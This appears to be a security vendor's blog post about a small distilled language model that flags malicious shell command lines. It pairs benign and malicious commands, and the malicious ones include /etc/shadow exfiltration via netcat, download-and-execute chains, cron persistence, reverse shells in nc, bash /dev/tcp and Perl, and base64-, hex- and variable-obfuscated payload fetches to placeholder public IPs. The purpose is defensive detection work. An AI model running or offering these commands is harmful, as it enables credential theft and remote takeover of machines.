dnadamson
Staff
March 10, 2026

AI-Based Detection of Malicious Command Lines via Knowledge Distillation


AI-Based Detection of Malicious Commands

 

Recently, we released a new AI model as part of our FortiCNAPP product to further improve the resilience of our intrusion detection capability. The Anomalous Host Command detection uses small language models to identify shell command line strings that:

  • differ significantly from those previously executed in the environment, and
  • exhibit characteristics that are suggestive of malicious activity.

This model contributes signals to FortiCNAPP Composite Alerts and makes our platform more robust to attempts to evade detection.

 

 

Why Shell Commands?

 

Reliable intrusion detection integrates signals from numerous data sources to distinguish malicious activity from benign background noise. Process data, including the command line string associated with each process, is one of the more valuable data sources we analyze. This command line data is so valuable because it has the potential to provide strong evidence of malicious intent. At the same time, because there are many ways to compose a command line that would accomplish the same task, there are many ways for a command line author to hide their intent.

 

The signals that reveal malicious intent vary widely in strength and subtlety. Some are obvious, for example: invoking known exploit software or establishing a reverse shell. Others are weaker on their own but meaningful in combination: the use of fallback execution chains, execution from world-writable directories, suppressing output, connecting to raw public IP addresses, or encoding payloads.

 

In order to demonstrate the complexity of identifying malicious commands, we present several classes of malicious commands below and compare them to similar benign examples.

 

Example Shell Commands

 

Known Intrusive Software

In the simplest cases, command line strings can reveal an intrusion through the invocation of known exploit software. Tools like kinsing, Responder.py, and hydra, among innumerable others, have few to no use cases beyond malicious exploitation or penetration testing. As such, the presence of these strings in command lines is an obvious signal of an intrusion in progress, either by attackers or by a red team.

 

Known Intrusive Software Examples:

curl -o /tmp/kinsing http://<PUBLIC_IP>/kinsing
sudo python Responder.py -I eth0
hydra -L users.txt -P passwords.txt -t 4 -f ftp://<PUBLIC_IP>
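Because these tool names are so distinctive, even a trivial lookup catches the examples above. The following is a minimal sketch that assumes a hypothetical hard-coded denylist and uses shell-style tokenization from Python's shlex module. It is an illustration, not FortiCNAPP's detection logic.

```python
import os
import shlex

# Hypothetical denylist of tool names with few legitimate uses (illustrative only).
KNOWN_TOOLS = {"kinsing", "responder.py", "hydra"}


def known_tool_hits(command: str) -> set[str]:
    """Return denylisted tool names that appear as tokens (or path basenames) in a command."""
    hits = set()
    for token in shlex.split(command):
        # Compare the last path component so /tmp/kinsing and http://host/kinsing both match.
        name = os.path.basename(token).lower()
        if name in KNOWN_TOOLS:
            hits.add(name)
    return hits


for cmd in [
    "curl -o /tmp/kinsing http://<PUBLIC_IP>/kinsing",
    "sudo python Responder.py -I eth0",
    "hydra -L users.txt -P passwords.txt -t 4 -f ftp://<PUBLIC_IP>",
    "ls -la /var/log",
]:
    print(cmd, "->", sorted(known_tool_hits(cmd)))
```

Renaming the binary is enough to defeat a lookup like this one.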

 

Living off the Land

Because known exploit tools are simple to detect, sophisticated attackers tend to avoid them. Instead, they often use tools that are both commonly available on target machines and widely used for benign purposes. This practice is referred to as Living-off-the-Land (LotL). By leveraging these dual-use utilities, known as LOLBins (living-off-the-land binaries), an attacker can blend in with standard administrative activity and bypass simpler detection schemes.

 

Dual Use Example 1: Can you tell which command is likely malicious?

cat /etc/shadow | nc <PUBLIC_IP> 4444
cat /var/log/syslog | nc <PRIVATE_IP> 514
Dual Use Example 1: Both of the following commands send the contents of a file to another machine using nc (netcat). Structurally, the commands are almost identical, but the first command is far more suspicious. This is because /etc/shadow contains highly sensitive password hash data, and the command sends it to a public internet address on an arbitrary port. In contrast, the second command sends less sensitive log data (/var/log/syslog) to an internal system using a port commonly associated with logging. Small differences in the file being accessed and the destination of the network connection can therefore make a command appear benign or highly suspicious.

Malicious

cat /etc/shadow | nc <PUBLIC_IP> 4444

Benign

cat /var/log/syslog | nc <PRIVATE_IP> 514
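One detail that separates these two commands is whether the destination is a public or a private address, and that is easy to compute once the address is known. The following is a minimal sketch that uses Python's standard ipaddress module. The addresses are hypothetical stand-ins for <PUBLIC_IP> and <PRIVATE_IP>. A learned model weighs a feature like this together with the file being read and the port, rather than treating any single feature as decisive.

```python
import ipaddress


def destination_kind(host: str) -> str:
    """Classify a literal IP destination as public or private; hostnames are left to other checks."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    return "private" if addr.is_private else "public"


# Hypothetical stand-ins for <PUBLIC_IP> and <PRIVATE_IP>.
print(destination_kind("8.8.8.8"))        # public
print(destination_kind("10.0.0.5"))       # private
print(destination_kind("logs.internal"))  # hostname
```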

 

Dual Use Example 2: Can you tell which command is likely malicious?

curl -fsSL https://deb.nodesource.com/setup_lts.x | bash -
/bin/sh -c curl -o /tmp/update http://<PUBLIC_IP>:8000/update && chmod 777 /tmp/update && /tmp/update
Dual Use Example 2: Both of the following commands involve downloading and executing software. The first command is suspicious because it downloads a file from a hard-coded public IP address, stores it in the world-writable /tmp directory under a generic filename, grants it overly permissive rights (chmod 777 makes it readable, writable, and executable by every user), and immediately executes it. In contrast, the second command shows a legitimate software installation workflow using a trusted vendor distribution endpoint. Enterprise software is often installed using vendor-provided bootstrap scripts from well-known domains rather than arbitrary hosts. Piping a downloaded script directly to bash does not follow security best practices, but it is a common pattern.

Malicious
/bin/sh -c curl -o /tmp/update http://<PUBLIC_IP>:8000/update && chmod 777 /tmp/update && /tmp/update
Benign
curl -fsSL https://deb.nodesource.com/setup_lts.x | bash -

 

Dual Use Example 3: Can you tell which command is likely malicious?

/bin/sh -c "echo '* * * * * /tmp/.update.sh >/dev/null 2>&1' | crontab -"
/bin/sh -c "echo '0 2 * * * /usr/local/bin/daily-backup.sh' | crontab -"
Dual Use Example 3: Both of the following commands schedule recurring tasks using cron, but they differ in intent and risk indicators. The first command is more suspicious because it schedules a script located in the /tmp directory, uses a hidden file name (.update.sh), and suppresses all output by redirecting both stdout and stderr to /dev/null. The once-per-minute execution frequency is also quite aggressive. This combination of behaviors is commonly associated with persistence mechanisms that attempt to hide activity from system logs and administrators. In contrast, the second command represents a typical system maintenance workflow, scheduling a backup task to run once per day using a clearly named script stored in a standard system directory. The difference between these commands illustrates how small changes in file location, naming conventions, execution frequency, and logging behavior can significantly change how a command is interpreted from a security perspective.

Malicious
/bin/sh -c "echo '* * * * * /tmp/.update.sh >/dev/null 2>&1' | crontab -"
Benign
/bin/sh -c "echo '0 2 * * * /usr/local/bin/daily-backup.sh' | crontab -"
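The difference in execution frequency can be made concrete. The following minimal sketch uses a deliberately simplified, hypothetical cron parser. It reads only the minute and hour fields and understands only `*` or a single integer in each. Real cron syntax also allows ranges, lists, and steps such as `*/5`.

```python
def runs_per_day(schedule: str) -> int:
    """Count executions per day (on days the entry runs) from a cron schedule's minute and hour fields.

    Simplification: each field must be '*' or a single integer; ranges, lists,
    and steps (e.g. '1-5', '0,30', '*/5') are not handled.
    """
    minute, hour = schedule.split()[:2]
    minutes = 60 if minute == "*" else 1
    hours = 24 if hour == "*" else 1
    return minutes * hours


print(runs_per_day("* * * * *"))  # 1440, the /tmp/.update.sh entry
print(runs_per_day("0 2 * * *"))  # 1, the daily-backup.sh entry
```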

 

Reverse Shell

One of the clearest signals of compromise on a machine is a reverse shell command, provided you can recognize it. In a reverse shell, the compromised machine initiates an outbound connection to a remote machine and hands it interactive shell access. Because the connection is outbound, this works even when the compromised machine cannot accept inbound connections from the internet. There are few, if any, legitimate reasons to set up an interactive shell this way, so a reverse shell is a high-confidence signal that an intrusion or penetration test is in progress. However, there are so many ways to construct one that detecting reverse shells with both high precision and high recall is non-trivial. Some very different-looking examples of reverse shell commands are shown below.

 

Reverse Shell Example 1: Can you tell which command sets up a reverse shell?

nc -e /bin/sh <PUBLIC_IP> 443
nc -zv database.internal.corp 5432
Reverse Shell Example 1: Both of the following commands use nc (netcat), a general-purpose networking utility commonly found on Linux systems. The first command uses the -e flag to attach an interactive shell to an outbound connection on port 443 (the standard HTTPS port), effectively establishing a reverse shell that could blend in with normal web traffic. The second is a routine connectivity check: the -z flag tells netcat to check whether a port is listening without sending any data, and -v enables verbose output. System administrators and health check scripts frequently use netcat this way to verify that internal services are reachable. The presence of -e with a shell path is the critical distinguishing detail. However, not all versions of netcat support -e, so attackers also use alternative reverse shell commands that are harder to catch with signatures.

Malicious
nc -e /bin/sh <PUBLIC_IP> 443

Benign

nc -zv database.internal.corp 5432

 

Reverse Shell Example 2: Can you tell which command sets up a reverse shell?

bash -c 'exec 3<>/dev/tcp/vault.internal.corp/8200 && echo -e "GET /v1/sys/health HTTP/1.1\r\nHost: vault\r\n\r\n" >&3 && cat <&3'
bash -c 0<&189-;exec 189<>/dev/tcp/<PUBLIC_IP>/4444;sh <&189 >&189 2>&189
Reverse Shell Example 2: Both of the following commands use bash's built-in /dev/tcp pseudo-device to open a TCP connection via file descriptor redirection. The first opens a connection to a public IP and routes the stdin, stdout, and stderr of an interactive shell through it. This is a classic reverse shell that needs no dedicated networking tool such as nc, so it can slip past detections that look for those tools. The second uses the same /dev/tcp mechanism to perform a lightweight HTTP health check against an internal Vault service, a pattern sometimes used in shell scripts where curl is unavailable. The underlying mechanics are nearly identical: open a socket, redirect I/O through a file descriptor. The difference lies in whether the connection target is an attacker-controlled host and whether an interactive shell is attached to the other end.

Malicious
bash -c 0<&189-;exec 189<>/dev/tcp/<PUBLIC_IP>/4444;sh <&189 >&189 2>&189

Benign

bash -c 'exec 3<>/dev/tcp/vault.internal.corp/8200 && echo -e "GET /v1/sys/health HTTP/1.1\r\nHost: vault\r\n\r\n" >&3 && cat <&3'

 

Reverse Shell Example 3: Can you tell which command sets up a reverse shell?

perl -e 'use Socket;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,5);print "Listening on port $p\n";accept(C,S);print C "OK\n";close(C);'
sudo perl -e 'use Socket;$i="<PUBLIC_IP>";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");$s="/bi"."n/s"."h";exec("$s -i");};'
Reverse Shell Example 3: Both of the following commands are Perl one-liners that import the Socket module and use low-level socket system calls. The first opens an outbound connection to an attacker IP, redirects all three standard file descriptors to the socket, and spawns an interactive shell. This gives the remote party full remote code execution capability. The second uses the same Socket primitives but binds a simple local listener that accepts a connection and responds with a status message, a pattern seen in ad-hoc testing or quick-and-dirty service stubs. Both involve inline Perl executed with -e, and both manipulate sockets directly. The key differentiator is the obscured exec call that spawns an interactive shell combined with STDIN/STDOUT/STDERR redirection to a remote host. That combination is the signature of a reverse shell, but spotting it requires parsing the semantics of the command, not just its surface syntax.

Malicious
sudo perl -e 'use Socket;$i="<PUBLIC_IP>";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");$s="/bi"."n/s"."h";exec("$s -i");};'

Benign

perl -e 'use Socket;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,5);print "Listening on port $p\n";accept(C,S);print C "OK\n";close(C);'

 

Layers of Obfuscation

To better evade detection, attackers will also obfuscate the intent of their commands in various ways. Attackers may encode the command in base64, hexadecimal or any number of other schemes that are likely to be decodable by the target host. They may also fragment tool names, URLs, and other identifiable tokens across variables to remove searchable substrings from the command. Additionally, attackers may include a lot of extraneous content to throw off detection tools, including wrapping their actual command within other more benign-looking commands.

 

Obfuscation Example 1: Can you tell which command is likely malicious?

echo $KUBECONFIG_B64 | base64 -d > ~/.kube/config
sh -c echo <BASE64_STRING> | base64 -d | bash
Obfuscation Example 1: Both of the following commands pipe base64-encoded content through base64 -d to decode it. The first decodes a hidden payload and pipes the result directly into bash for execution. In that case, the base64 encoding serves no purpose other than to disguise the actual commands being run from static analysis and human review. The second decodes a Kubernetes configuration file and writes it to disk, a common pattern in CI/CD pipelines where structured data containing special characters is stored as base64 in environment variables. Both commands look similar at a glance: echo, a base64 value, and base64 -d. The critical difference is the destination. Piping to bash means the decoded content will be executed as code, while redirecting to ~/.kube/config simply writes data to a file.

Malicious
sh -c echo <BASE64_STRING> | base64 -d | bash

Benign

echo $KUBECONFIG_B64 | base64 -d > ~/.kube/config
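To see why encoding defeats simple string matching, consider a hypothetical payload. The following minimal sketch uses Python's standard base64 module. The payload (with the reserved example.invalid domain) and the keyword list are illustrative assumptions.

```python
import base64

# Hypothetical payload; example.invalid is a reserved, non-resolving domain.
payload = "curl -fsSL http://example.invalid/x | sh"
encoded = base64.b64encode(payload.encode()).decode()
command = f"sh -c echo {encoded} | base64 -d | bash"

# Hypothetical keywords a simple string-matching rule might look for.
keywords = ["curl", "http://"]

# Searching the raw command line finds nothing...
print([k for k in keywords if k in command])  # []
# ...but the same search over the decoded payload finds both keywords.
decoded = base64.b64decode(encoded).decode()
print([k for k in keywords if k in decoded])  # ['curl', 'http://']
```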

 

Obfuscation Example 2: Can you tell which command is likely malicious?

/usr/bin/git archive --format=zip --prefix=vE --exec=`perl -e 'system(pack(qq,H152,,qq,<HEX_STRING>,))'` --remote=fcqKwlA/ --
/usr/bin/git archive --format=zip --prefix=release-v2.1/ --exec=/usr/local/bin/git-upload-archive --remote=git@gitlab.internal.corp:platform/api.git HEAD
Obfuscation Example 2: Both of the following commands invoke git archive to create a zip archive from a remote repository. The first abuses the --exec flag (which normally specifies the path to git-upload-archive on the remote end) to inject a Perl one-liner that decodes and executes a hex-encoded payload. The second uses --exec as intended, pointing to a git-upload-archive binary installed in a non-standard location. Both commands are long, complex, and use the same flags. The malicious intent is buried inside a backtick-evaluated Perl expression within a single flag value, making it easy to miss during manual review or simple pattern matching.

Malicious
/usr/bin/git archive --format=zip --prefix=vE --exec=`perl -e 'system(pack(qq,H152,,qq,<HEX_STRING>,))'` --remote=fcqKwlA/ --

Benign

/usr/bin/git archive --format=zip --prefix=release-v2.1/ --exec=/usr/local/bin/git-upload-archive --remote=git@gitlab.internal.corp:platform/api.git HEAD
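The Perl fragment `pack(qq,H152,,qq,<HEX_STRING>,)` uses commas as `qq` quote delimiters, so it is equivalent to `pack("H152", "<HEX_STRING>")`. The `H` template turns 152 hex digits (high nybble first) into 76 bytes of text, which `system()` then runs. The following minimal Python sketch mimics that decoding step. The function name is hypothetical, and the hex string is a made-up stand-in for the elided payload.

```python
def perl_pack_hex(count: int, hex_string: str) -> str:
    """Mimic Perl's pack("H<count>", hex_string) for an even count: read `count`
    hex digits, high nybble first, and return the resulting bytes as text.

    Simplification: assumes hex_string has at least `count` digits.
    """
    if count % 2:
        raise ValueError("this sketch only handles an even number of hex digits")
    # latin-1 maps each byte to exactly one character, like Perl's byte strings.
    return bytes.fromhex(hex_string[:count]).decode("latin-1")


# Hypothetical stand-in for <HEX_STRING>: 16 hex digits that spell "uname -a".
print(perl_pack_hex(16, "756e616d65202d61"))  # uname -a
# A template of H152 consumes 152 hex digits and yields 152 // 2 bytes.
print(152 // 2)  # 76
```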

 

Obfuscation Example 3: Can you tell which command is likely malicious?

p=http; h=<PUBLIC_IP>; c=cu; c=${c}rl; s=s; s=${s}h; $c -fsSL $p://$h/x | $s
curl -fsSL $GITHUB_API_URL | jq -r '.tag_name'
Obfuscation Example 3: Both of the following commands use curl to fetch content from a remote URL and pipe the result to another program, though in the first case this is far from obvious. The first fragments every meaningful token (i.e., the tool name, protocol, host, and even the shell invocation) across multiple variables that are reassembled at execution time. None of curl, http://, the target address, or sh appears as a contiguous string anywhere in the command, rendering simple pattern matching and keyword-based detection effectively useless. The second also uses a variable for the URL, a routine practice in CI/CD environments where configuration is injected through environment variables, and pipes the response to jq for JSON parsing. Both commands leverage shell variables to resolve key values at runtime. The first does so deliberately to fragment identifiable tokens and evade string-based detection, while the second does so as a natural consequence of how deployment pipelines are configured.

Malicious
p=http; h=<PUBLIC_IP>; c=cu; c=${c}rl; s=s; s=${s}h; $c -fsSL $p://$h/x | $s

Benign

curl -fsSL $GITHUB_API_URL | jq -r '.tag_name'
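A naive keyword rule shows how the two commands above trip up string matching. The following minimal sketch assumes a hypothetical list of watched substrings. It also includes a toy expander that handles only the simple `NAME=value` assignments and `$NAME` or `${NAME}` references used in this example. A real shell does far more.

```python
import re

# Hypothetical substrings a simple keyword rule might watch for.
WATCHED = ["curl", "http://", "| sh"]

MALICIOUS = "p=http; h=<PUBLIC_IP>; c=cu; c=${c}rl; s=s; s=${s}h; $c -fsSL $p://$h/x | $s"
BENIGN = "curl -fsSL $GITHUB_API_URL | jq -r '.tag_name'"


def naive_flags(command: str) -> list[str]:
    """Return the watched substrings that appear literally in the command."""
    return [w for w in WATCHED if w in command]


def substitute(text: str, env: dict[str, str]) -> str:
    """Replace $NAME and ${NAME} with values from env (unknown names become empty)."""
    return re.sub(r"\$\{(\w+)\}|\$(\w+)", lambda m: env.get(m.group(1) or m.group(2), ""), text)


def expand_simple_vars(command: str) -> str:
    """Toy expander: every ';'-separated statement except the last must be NAME=value."""
    statements = [s.strip() for s in command.split(";")]
    env: dict[str, str] = {}
    for statement in statements[:-1]:
        name, value = statement.split("=", 1)
        env[name] = substitute(value, env)
    return substitute(statements[-1], env)


print(naive_flags(MALICIOUS))                      # []
print(naive_flags(BENIGN))                         # ['curl']
print(expand_simple_vars(MALICIOUS))               # curl -fsSL http://<PUBLIC_IP>/x | sh
print(naive_flags(expand_simple_vars(MALICIOUS)))  # ['curl', 'http://', '| sh']
```

The naive rule misses the malicious command and flags the benign one. Expanding variables fixes this particular case, but writing a special-purpose decoder for every obfuscation trick does not scale.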

 

These examples represent just a small fraction of the possible strategies that attackers employ when executing shell commands.

 

 

Why AI?

 

As we have seen from the above examples, recognizing the signals of malicious intent within command line strings is a complex challenge. The differences between benign commands and malicious ones can be subtle. Additionally, because command line strings are effectively miniature programs, robust detection of malicious intent requires holistic and semantic reasoning. While regex and basic pattern matching can flag more obvious examples, sophisticated attackers easily bypass these static filters through obfuscation and aliasing.

 

In contrast, transformer models (the same class of neural network architecture behind large language models like ChatGPT) are designed to process sequences of tokens and learn which parts of a sequence are most relevant to each other. A transformer doesn't evaluate each word or flag in isolation. Instead, it builds a representation of the entire command that captures how its components relate to one another. This means it can learn, for example, that curl followed by a pipe to sh with a raw IP address carries different intent than curl followed by a pipe to jq with an environment variable. This capacity for contextual reasoning across an entire sequence is what makes transformers well suited to distinguishing malicious commands from benign ones, where the difference often comes down to the combination of elements rather than any single keyword or substring. 
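The mechanism that lets a transformer relate tokens to one another is attention. The following minimal, pure-Python sketch shows scaled dot-product self-attention over a few toy token vectors. The vectors are made-up values, not learned weights. A real model adds learned query, key, and value projections, multiple heads, and many stacked layers. This is an illustration of the technique, not FortiCNAPP's model.

```python
import math


def softmax(scores: list[float]) -> list[float]:
    # Subtract the max for numerical stability before exponentiating.
    m = max(scores)
    exps = [math.exp(s - m) for s in scores]
    total = sum(exps)
    return [e / total for e in exps]


def self_attention(vectors: list[list[float]]) -> tuple[list[list[float]], list[list[float]]]:
    """Scaled dot-product self-attention with queries = keys = values = the inputs."""
    d = len(vectors[0])
    outputs, weights = [], []
    for q in vectors:
        # Similarity of this token to every token, scaled by sqrt(d).
        scores = [sum(a * b for a, b in zip(q, k)) / math.sqrt(d) for k in vectors]
        w = softmax(scores)
        weights.append(w)
        # The token's new representation is a weighted mix of all token vectors.
        outputs.append([sum(wj * v[i] for wj, v in zip(w, vectors)) for i in range(d)])
    return outputs, weights


# Made-up 3-dimensional vectors for the tokens of "curl <IP> | sh" (not learned values).
tokens = ["curl", "<IP>", "|", "sh"]
vectors = [[1.0, 0.2, 0.0], [0.1, 1.0, 0.0], [0.0, 0.0, 1.0], [0.9, 0.1, 0.3]]
outputs, weights = self_attention(vectors)
for token, row in zip(tokens, weights):
    print(f"{token:>5}", [round(x, 2) for x in row])
```

In this toy example, the `sh` row puts its largest weight on `curl` (dot product 0.92 versus 0.91 for itself) only because the made-up vectors were chosen to be similar. In a trained model, such relationships are learned from data.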

 

By leveraging transformer-based models, we can harden our intrusion detection capability, making it more robust to evasion by capturing the long-range associations and structural logic that define truly malicious behavior. Indeed, the act of obfuscation itself, in its innumerable permutations, can become the signal of malicious intent. Having established that transformer-based models are well suited to the task, the question becomes how to deploy them at scale without prohibitive cost.

 

 

Scalability & Cost Effectiveness

 

In an enterprise environment, the ensemble of monitored hosts can easily generate millions if not billions of process execution events per day, even after reasonable filtering. Since genuine intrusions and even penetration tests are comparatively rare events, the vast majority of these commands will reflect routine or at least benign activities. That means that recognizing malicious commands when they are executed is not only challenging because of the subtlety of the differences involved (as described above), but also because of the extreme scale of the datasets.

 

While the complexity of the signal justifies transformer-based models for detection, we must also find a way to apply that technology at scale. By one back-of-the-envelope calculation, even after filtering and fuzzy deduplication, analyzing command line data with large language models (LLMs) like those available from OpenAI or Anthropic could easily cost hundreds of thousands of dollars per year per FortiCNAPP customer. That is prohibitively expensive, particularly since interpreting command line data is just one form of analysis among many. To make AI practical in this case, the cost must be reduced by several orders of magnitude. Fortunately, by using a model that is more than 10,000 times smaller than today's LLMs, we can reduce the cost of inference by roughly that same factor.
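The scaling argument is simple arithmetic if inference cost is assumed to fall roughly in proportion to model size, as the paragraph above does. This is an approximation, since serving costs also depend on hardware, batching, and input length. The following sketch uses a hypothetical annual LLM cost chosen from the "hundreds of thousands of dollars" range.

```python
def scaled_inference_cost(llm_annual_cost: float, size_ratio: float) -> float:
    """Estimate annual cost for a smaller model, assuming cost falls in proportion to model size."""
    return llm_annual_cost / size_ratio


# Hypothetical inputs: $300,000 per customer per year with an LLM, and a model 10,000x smaller.
llm_cost = 300_000
slm_cost = scaled_inference_cost(llm_cost, 10_000)
print(f"${llm_cost:,} -> ${slm_cost:,.2f} per customer per year")  # $300,000 -> $30.00 per customer per year
```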

 

 

Knowledge Distillation

 

Until recently, training small models for targeted tasks like suspicious command line detection was difficult because sufficient volumes of high-quality, well-labeled data were not available. Now, however, large language models, which are very effective at classifying command line data as malicious or benign, can be used to generate training corpora for small language models (SLMs). In this setup, the LLMs act as "teacher" models and the SLMs act as "student" models. The process of using an LLM to "teach" an SLM to perform a specific task is referred to as knowledge distillation, because one is effectively "distilling" the understanding of a specific domain out of the general-purpose model.

 

In practice, we used a multi-stage prompting pipeline to generate our training corpus. First, the LLM was prompted to enumerate high level classes of malicious and benign commands. For each class, the LLM was then prompted to generate example commands, and finally to produce structurally similar pairs (one benign, one malicious) based on those individual examples to help the student model learn the discrimination boundary within each class. To prevent high-entropy tokens like IP addresses, long hex strings, and large integers from dominating the learned representations, we applied normalization to replace these elements with pre-defined placeholders before training. Regex pre-processing identifies and replaces these elements in command line strings during inference. The resulting student model has on the order of 10 million parameters, which is roughly 100,000 times smaller than the LLMs used to generate its training data.
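The normalization step can be sketched with a few regular expressions. The following is a minimal sketch. Its placeholder names and thresholds (what counts as a "long" hex string or a "large" integer) are hypothetical, since the actual values are not specified here. The same function would be applied to training examples and to live command lines, so the model sees the placeholders consistently.

```python
import re

# Hypothetical placeholder names and thresholds. Rules run in order, so IPv4
# addresses are replaced before their digits could match the other rules.
RULES = [
    # Dotted-quad IPv4 addresses (octet ranges are not validated in this sketch).
    (re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"), "<IP>"),
    # Runs of 16+ hex digits that contain at least one letter a-f.
    (re.compile(r"\b(?=[0-9a-fA-F]*[a-fA-F])[0-9a-fA-F]{16,}\b"), "<HEX>"),
    # Integers with 6 or more digits (ports and small counts are kept).
    (re.compile(r"\b\d{6,}\b"), "<NUM>"),
]


def normalize(command: str) -> str:
    """Replace high-entropy tokens with fixed placeholders."""
    for pattern, placeholder in RULES:
        command = pattern.sub(placeholder, command)
    return command


for cmd in [
    "nc -e /bin/sh 198.51.100.23 443",
    "echo 4142434445464748494a4b4c | xxd -r -p | sh",
    "sleep 1700000000 && curl http://10.0.0.5:8000/x",
]:
    print(normalize(cmd))
```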

 


Multi-Stage prompting & fine-tuning pipeline.
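The three prompting stages can be outlined as plain functions. The following is a minimal sketch under stated assumptions. `teacher` is a hypothetical callable that stands in for an LLM API call (prompt in, list of strings out), and the prompts are illustrative rather than the ones actually used. The stub teacher returns canned answers so the structure can run end to end. Fine-tuning the student model on the resulting corpus is not shown.

```python
from typing import Callable

# Hypothetical teacher interface: a prompt goes in, a list of strings comes out.
Teacher = Callable[[str], list[str]]


def build_corpus(teacher: Teacher) -> list[tuple[str, int]]:
    """Run the three prompting stages and return (command, label) pairs (1 = malicious)."""
    corpus: list[tuple[str, int]] = []
    for label, kind in [(1, "malicious"), (0, "benign")]:
        # Stage 1: enumerate high-level classes of this kind of command.
        for cls in teacher(f"List high-level classes of {kind} shell commands."):
            # Stage 2: generate individual example commands for the class.
            for example in teacher(f"Write example {kind} commands for: {cls}"):
                corpus.append((example, label))
                # Stage 3: a structurally similar pair, benign first and malicious second.
                benign, malicious = teacher(f"Write a benign and a malicious variant of: {example}")
                corpus += [(benign, 0), (malicious, 1)]
    return corpus


def stub_teacher(prompt: str) -> list[str]:
    """Canned answers so the sketch runs without calling a real LLM."""
    if prompt.startswith("List"):
        return ["cron persistence"] if "malicious" in prompt else ["scheduled backups"]
    if prompt.startswith("Write example"):
        cls = prompt.split(": ", 1)[1]
        return [f"# placeholder command for {cls}"]
    return [
        "echo '0 2 * * * /usr/local/bin/daily-backup.sh' | crontab -",
        "echo '* * * * * /tmp/.update.sh >/dev/null 2>&1' | crontab -",
    ]


corpus = build_corpus(stub_teacher)
for command, label in corpus:
    print(label, command)
```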

 

 

Anomalous ∩ Suspicious

 

We have a lot of experience with intrusion detection, and one of the key insights we have learned is the benefit of looking for signals that are both anomalous and security-relevant. Looking at anomalous signals alone will surface a lot of obviously benign content. Looking at "suspicious" signals alone will often produce recurring false positives, where customer code does something that goes against best practices and looks sketchy but is not actually malicious. Higher-fidelity detections come from looking for signals that are both anomalous and suspicious.

 

Following this paradigm, we designed our command line string models to produce two outputs: a suspicion score between 0 and 1, and an embedding vector that can be used for similarity comparisons with previously seen commands. If a command is sufficiently dissimilar from previously seen commands and has a high enough suspicion score, then an Observation (and potentially also a Composite Alert) is produced.
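The decision rule can be sketched in a few lines. The following minimal sketch assumes cosine similarity as the similarity measure and uses hypothetical threshold values. The actual metric, the thresholds, and the way the history of previously seen commands is stored are not specified here.

```python
import math


def cosine(a: list[float], b: list[float]) -> float:
    """Cosine similarity of two non-zero vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b)))


def should_observe(
    score: float,
    embedding: list[float],
    seen: list[list[float]],
    min_score: float = 0.9,       # hypothetical suspicion threshold
    max_similarity: float = 0.8,  # hypothetical novelty threshold
) -> bool:
    """True only when a command is both suspicious and unlike previously seen commands."""
    suspicious = score >= min_score
    # With no history, every command counts as novel.
    nearest = max((cosine(embedding, e) for e in seen), default=-1.0)
    anomalous = nearest < max_similarity
    return suspicious and anomalous


seen = [[1.0, 0.0, 0.0], [0.9, 0.1, 0.0]]
print(should_observe(0.95, [0.0, 0.1, 1.0], seen))   # True: suspicious and novel
print(should_observe(0.95, [1.0, 0.05, 0.0], seen))  # False: suspicious but familiar
print(should_observe(0.20, [0.0, 0.1, 1.0], seen))   # False: novel but not suspicious
```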

 

 


We trigger only on signals that are both anomalous and suspicious.

 

 

What Does This Look Like?

 

As a visual person, I find it easier to wrap my head around new concepts when I can represent them visually. To build intuition for what our model has learned, we can visualize how it represents different commands. Our model converts each command line string into a high-dimensional numerical vector: essentially a list of hundreds of numbers that encodes the model's understanding of that command's meaning and intent. Commands that the model considers similar will have vectors that are “closer together” in this high dimensional space and commands it considers different will have vectors that are “farther apart.” The challenge is that humans can't visualize hundreds of dimensions, so we use a technique called UMAP (Uniform Manifold Approximation and Projection) to compress these vectors down to two dimensions that we can chart on a scatter plot. While this compression inevitably loses some information, it preserves the relative neighborhood structure: commands that were close together in the model's high-dimensional space will tend to remain close together on the two dimensional plot.

 

To generate these plots, we took tens of thousands of real-world commands sampled from customer environments and combined them with LLM-generated commands, both benign and malicious, labeled by type. The gray points that form the background of each plot represent the benign real-world commands. In other words, that is the "noise" that a detector must sift through. In the first plot, we overlay several categories of malicious commands in color. Notice that they roughly cluster together toward one region of the space, suggesting that the model has learned a representation in which malicious commands share common characteristics that separate them from the majority of the benign background.

 


UMAP plot of example malicious commands. Each point represents a single command, positioned based on the model's learned similarity. Commands the model interprets as similar appear closer together. Malicious command categories (colored) cluster toward the upper edge of the benign background (gray), with notable overlap between categories.

 

In the four plots that follow, we color-code selected categories of benign commands individually to show how the model organizes them. Commands related to container management and infrastructure-as-code occupy different regions than those related to file operations or networking. It is the latter two categories that co-mingle the most with the distribution of malicious commands, and this makes intuitive sense given that malicious commands often involve file manipulation and network connections.

 


Container management commands (green) concentrate in a distinct region at the lower right, well separated from the malicious cluster.

 


Infrastructure-as-code commands (red) occupy the lower right and periphery, largely distinct from the malicious region.

 


File operation commands (purple) spread broadly across the space, overlapping somewhat with the regions where malicious commands cluster.

 


Networking commands (orange) spread widely and extend into the upper region where malicious commands are concentrated, reflecting the structural similarity between benign network operations and malicious network-based techniques.

 

All told, while it is difficult to compress the high-dimensional representation of our model down to two dimensions for visualization, UMAP still allows us to peek into the operation of the model and see what kinds of commands are most obviously different and where the subtleties arise. Being able to see reasonable differences on a UMAP plot, however, in no way proves the utility of the model. For that, we turn to more rigorous testing.

 

 

Validation Through Discovery

 

Before we released our Anomalous Host Command detection model, FortiCNAPP already included a large ensemble of high-precision detections to identify malicious processes based on their metadata. Our goal with this model was to significantly broaden the recall of our malicious process detection to catch previously unseen intrusive commands. Further, we wanted to accomplish this while also keeping our overall rate of detection low, thus preventing alert fatigue.

 

